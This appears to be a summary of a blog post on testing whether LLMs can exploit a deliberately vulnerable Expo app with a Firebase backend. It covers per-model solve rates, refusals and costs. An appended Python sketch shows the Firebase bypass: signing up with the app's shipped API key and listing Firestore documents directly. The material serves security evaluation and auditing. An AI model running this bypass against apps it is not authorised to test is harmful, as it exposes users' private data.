I built a vulnerable app and spent $1,500 seeing if LLMs could hack it

3 hours ago

The author built a deliberately vulnerable React Native Expo app with a Python FastAPI backend and Firebase to test whether LLMs could exploit common security flaws.
The exploit involved taking the Firebase credentials shipped in the app, using them to sign up with Firebase directly, and reading Firestore, which bypassed the otherwise secure API. This is a common real-world issue.
GPT-5.5 had the highest solve rate (7/10) and focused quickly on Firebase; other models, such as DeepSeek V4 Pro (3/10) and the Claude variants (2/10), succeeded less often.
Several models (e.g., Gemini 3.1 Pro Preview, DeepSeek V4 Flash) failed because they refused the task or misdirected their effort, with some fixating on exploiting the API instead of Firebase.
The experiment cost $1,500 and surfaced challenges such as model guardrails, high costs for some providers, and technical hurdles in running the evaluation harness.
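
The Firebase bypass summarized above can be sketched roughly as follows, for auditing a project you own. This is a minimal illustration, not the author's actual exploit or harness: it assumes email/password sign-up is enabled and uses the public Firebase Auth and Firestore REST endpoints. The API key, project ID, collection name, and helper function names are hypothetical placeholders, not values from the article.

```python
import json
import urllib.request

# Hypothetical placeholders. In the scenario described, values like these are
# read from the Firebase config bundled with the mobile app.
API_KEY = "YOUR_WEB_API_KEY"
PROJECT_ID = "your-project-id"
COLLECTION = "users"  # assumed collection name, for illustration only


def build_signup_request(api_key: str, email: str, password: str) -> urllib.request.Request:
    """Build a sign-up call to the Firebase Auth REST API (no backend involved)."""
    url = f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={api_key}"
    body = json.dumps(
        {"email": email, "password": password, "returnSecureToken": True}
    ).encode("utf-8")
    return urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}, method="POST"
    )


def build_firestore_list_request(
    project_id: str, collection: str, id_token: str
) -> urllib.request.Request:
    """Build a Firestore REST call that lists documents in one collection."""
    url = (
        "https://firestore.googleapis.com/v1/"
        f"projects/{project_id}/databases/(default)/documents/{collection}"
    )
    return urllib.request.Request(
        url, headers={"Authorization": f"Bearer {id_token}"}, method="GET"
    )


def send(request: urllib.request.Request) -> dict:
    """Send a prepared request and decode the JSON response."""
    with urllib.request.urlopen(request) as response:
        return json.loads(response.read())


# Example flow against your own test project (left commented out on purpose):
# signup = send(build_signup_request(API_KEY, "tester@example.com", "a-long-password"))
# docs = send(build_firestore_list_request(PROJECT_ID, COLLECTION, signup["idToken"]))
```

Whether the second request returns data depends on the project's Firestore security rules. If the rules allow any signed-in user to read a collection, a self-registered account is enough, regardless of how carefully the FastAPI layer checks permissions.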
